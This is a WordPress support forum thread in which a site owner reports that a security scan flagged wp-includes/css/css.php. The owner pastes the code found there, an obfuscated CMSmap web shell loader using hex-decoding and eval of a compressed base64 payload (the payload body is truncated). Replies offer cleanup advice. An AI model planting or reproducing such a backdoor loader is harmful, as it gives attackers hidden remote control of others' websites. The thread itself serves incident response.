File apperas to be malicious wp-includes/css/css.php

  • Resolved madhu patidar

    (@madhu-patidar)


    4 years, 6 months ago

    Hi,

    After scanning my site from wordfence plugin, I’m getting a message saying ‘../wp-includes/css/css.php’ and ‘../wp-includes/css/wp-config.php’. contain malicious code.

    The above both files contains below code- and i don’t have this plugin “CMSmap – WordPress Shell”.

    “<?php
    /**
    * Plugin Name: CMSmap – WordPress Shell
    * Plugin URI: https://github.com/m7x/cmsmap/
    * Description: Simple WordPress Shell – Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program.
    * Version: 1.0
    * Author: CMSmap
    * Author URI: https://github.com/m7x/cmsmap/
    * License: GPLv2
    */
    ?>
    <?php
    $password=’123456′;
    $shellname=’123456′;
    $myurl=null;
    error_reporting(0);
    @set_time_limit(0);
    function Class_UC_key($string){
    $array = strlen (trim($string));
    $debuger = ”;
    for($one = 0;$one < $array;$one+=2) {
    $debuger .= pack (“C”,hexdec (substr ($string,$one,2)));
    }
    return $debuger;
    }
    header(“content-Type: text/html; charset=gb2312”);
    $filename=Class_UC_key(“2470617373776F72643D27”).$password.
    Class_UC_key(“273B247368656C6C6E616D653D27”).$Username.
    Class_UC_key(“273B246D7975726C3D27”).$Url.
    Class_UC_key(“273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827″).’eJzsJ ………….. Y8f8Dk7fBIg==\’)));’;
    $PHP=Create_Function(”,$filename);$PHP();?>”

    I deleted these file but then it automatically re-creates itself ?

    Any ideas please?

Viewing 5 replies - 1 through 5 (of 5 total)

  • I want to know this too

    if anyone know please tell me too.

    Thread Starter madhu patidar

    (@madhu-patidar)

    Hi..

    i didn’t find that where is coming from, but i tried something else that is solved my issue, you can try this.

    I replaced all plugin with my local copy and also replaced wp-admin and wp-includes folder with new fresh wordpress folders.

    You can also try deactivate all plugins one by one and install fresh one.

    before doing this please take a backup of your site.

    Thanks.

    Hey @madhu-patidar and @daydreamrocku,

    Unfortunately, this does seem like a compromise. I’d suggest immediately changing all passwords including WordPress, sFTP, database, and hosting control panel.

    @daydreamrocku has given great advice regarding replacing the wp-admin and wp-admin directories. Additionally, perhaps the guide below can help. However, jif you’re not comfortable doing this or the infection returns I’d suggest getting with a professional hack repair service to clean the site and patch the point of entry.

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Thanks,

    Gerroald

    Hi,

    We haven’t heard back from you in a while, so I’ve gone ahead and marked this thread as resolved.

    Please feel free to open another thread if you’re still having issues with Wordfence.

    Thanks,

    Gerroald

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘File apperas to be malicious wp-includes/css/css.php’ is closed to new replies.